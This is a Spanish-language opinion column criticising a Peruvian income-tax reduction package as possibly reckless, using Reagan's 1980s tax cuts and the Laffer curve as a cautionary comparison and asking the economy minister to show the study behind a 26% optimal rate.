La reducción de impuestos podría ser temeraria

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En mi columna anterior le decía al gobierno que todo depende de su voluntad si quiere que sigamos creciendo a niveles superiores al 5% por los próximos años, que se ponga el país al hombro y que no genere ruido político innecesario. Tal parece que les llegó el mensaje, pues días después el ministro de Economía, Alonso Segura, lanzó un nuevo, agresivo y quizá temerario paquete de medidas que incluye, entre otras cosas, reducciones de impuestos a la renta.

En sencillo, lo que el gobierno acaba de hacer es dejar de cobrar una parte de los impuestos para ponerlo en el bolsillo de los peruanos y de las empresas, de tal manera que ellos mismos se encarguen de gastarlo de la mejor forma posible. Esto es positivo ya que uno de los grandes problemas del gobierno es la capacidad de gasto y sobretodo la calidad del mismo. Este es el camino más fácil si es que quieres impulsar la economía en el corto plazo sin tener que trabajar mucho. También es temerario si es que la medida no se diseña tomando en cuenta todos sus efectos en el largo plazo.

Y aquí entra a tallar Ronald Reagan. ¿Cómo? ¿Ronald Reagan? ¿Qué tiene que ver él con Humala? Simple: tras asumir la presidencia de EE.UU. a inicios de los años 80’, su gobierno redujo los impuestos bajo la premisa de que eran tan altos que éstos desalentaban a muchas personas para que trabajen. Bajo ésta lógica, al reducirlos se generarían los incentivos para que más personas trabajen, impulsando así la economía e iniciando un círculo virtuoso de más empleo, más consumo y más producción. El resultado fue que entre 1981 y 1984 los ingresos fiscales cayeron considerablemente a pesar que los ingresos de las empresas y personas aumentaron, iniciándose un período de fuertes déficits fiscales.

La política de Reagan se basaba en que se daría un efecto conocido como la “curva de Laffer”, que indica que si la tasa impositiva es muy alta (esto es la clave), reducirla hacia un nivel óptimo incrementará la recaudación, pues aquellos que no pagan impuestos por ser éstos muy altos lo harán una vez que se reduzcan. Evidentemente, lo básico acá es determinar con total seguridad que la tasa impositiva es efectivamente alta.

La pregunta, entonces, se cae de madura: ¿el MEF habrá hecho el estudio para determinar que, efectivamente, la tasa impositiva en el Perú es alta? ¿Habrán construido la curva de Laffer para nuestro país y en base ello se llegó a la conclusión de que la tasa óptima es 26%, como lo será a partir de 2019? ¿O sólo hicieron un focus group para determinar dicha tasa, como dicen las malas lenguas?

Si no lo hicieron, entonces en el 2015 tendremos un repunte de la economía gracias al mayor consumo e inversión, pero también el inicio de un período de fuertes déficits fiscales. Claro que, como es de esperarse, este gobierno terminará con una buena foto y dejará “el muerto” para el siguiente.

La reducción de impuestos anunciada por el MEF es una medida temeraria. Hasta ahora no he visto un estudio concluyente que nos diga que nuestras tasas son altas y que el problema de la recaudación fiscal es un problema del nivel de la tasa (y no lo es, por ejemplo, la falta de “cultura fiscal”). Tampoco conozco un país en vías de desarrollo al que le haya ido bien luego de haber reducido sus tasas impositivas de manera permanente; de hecho, esto ni siquiera pasó en EE.UU. Por esta razón, quisiera invocar al ministro Segura a que nos cuente un poco más sobre cómo es que la reducción de los impuestos impactará en el déficit fiscal de largo plazo, no sólo en el 2015, y que nos muestre el estudio donde se determina que la tasa impositiva óptima es 26%. Y si esto no es así, espero que nos diga qué es lo que hará si el déficit fiscal se le va de las manos.

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